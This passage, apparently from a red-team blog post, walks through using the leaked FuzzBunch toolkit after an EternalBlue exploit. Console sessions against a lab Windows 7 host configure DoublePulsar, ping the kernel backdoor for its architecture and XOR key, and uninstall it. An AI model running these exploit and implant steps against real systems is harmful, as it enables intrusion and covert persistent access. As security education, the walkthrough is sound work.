=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

Eternalblue Exploit Methodology

One of the interesting aspects of this exploit is the type of loader they decided to deploy, which in many cases makes total sense, allowing operators to be fluid and have options under different environmental constraints. A great example, as we introduce DoublePulsar next, is the ability to use this backdoor to execute user-mode code of choice: an obvious benefit of a layered option, reducing the number of implants at risk at any given time in a failed exploit scenario.

DoublePulsar

Man, one of my favorites in this toolkit is the expandability of nearly all toolsets, as we mentioned earlier. DoublePulsar (DP) does some interesting magic that can be covered in way more detail here.

DoublePulsar Features

To interact with our freshly created Back Door, we can use DP to send different commands and install our next stage of the implant.

DoublePulsar Arch

First, select the proper architecture that we obtained from our EB output ([+] Ping returned Target architecture: x64 (64-bit)) in the prior exploit.

fb > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.251.136] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor
   
[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 1
[+] Set Architecture => x64

DoublePulsar Operation

In some cases it would make sense to reverify the architecture and the operation of the implant if you are doing maintenance or just coming back to an operation that may have been down for a large portion of time. So let's start with a Ping:

[?] Function [0] : 1
[+] Set Function => Ping


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
Protocol          SMB
Architecture      x64
Function          Ping

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
    SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
    Target OS is: 7 x64
    Target SP is: 1
        [+] Backdoor installed
        [+] Command completed successfully
[+] Doublepulsar Succeeded

Next, in the case of pulling out of an environment, it even supplies an "Uninstall" function:

fb Payload (Doublepulsar) > set Function Uninstall
[+] Set Function => Uninstall
fb Payload (Doublepulsar) > execute

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
Protocol          SMB
Architecture      x64
Function          Uninstall

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
    SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
    Target OS is: 7 x64
    Target SP is: 1
        [+] Backdoor installed
        [.] Sending burn implant message
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor killed
        [+] Command completed successfully
[+] Doublepulsar Succeeded

Final Thoughts

We just really brushed the surface of the entire series today; the next post will focus on the usage and deployment of code via DP. Cheers 🍺 NOTE: Not an IPA


  1. https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/etc/opscript.txt#L11552

  2. https://technet.microsoft.com/en-us/library/jj852166(v=ws.11).aspx

  3. https://msdn.microsoft.com/en-us/library/windows/desktop/aa378995(v=vs.85).aspx

Alexander Rymdeko-Harvey

Alexander Rymdeko-Harvey is an experienced Red Teamer. He loves to develop on offensive TTPs and has a knack for Windows internals. He prides himself on being a husband, father and prior Army.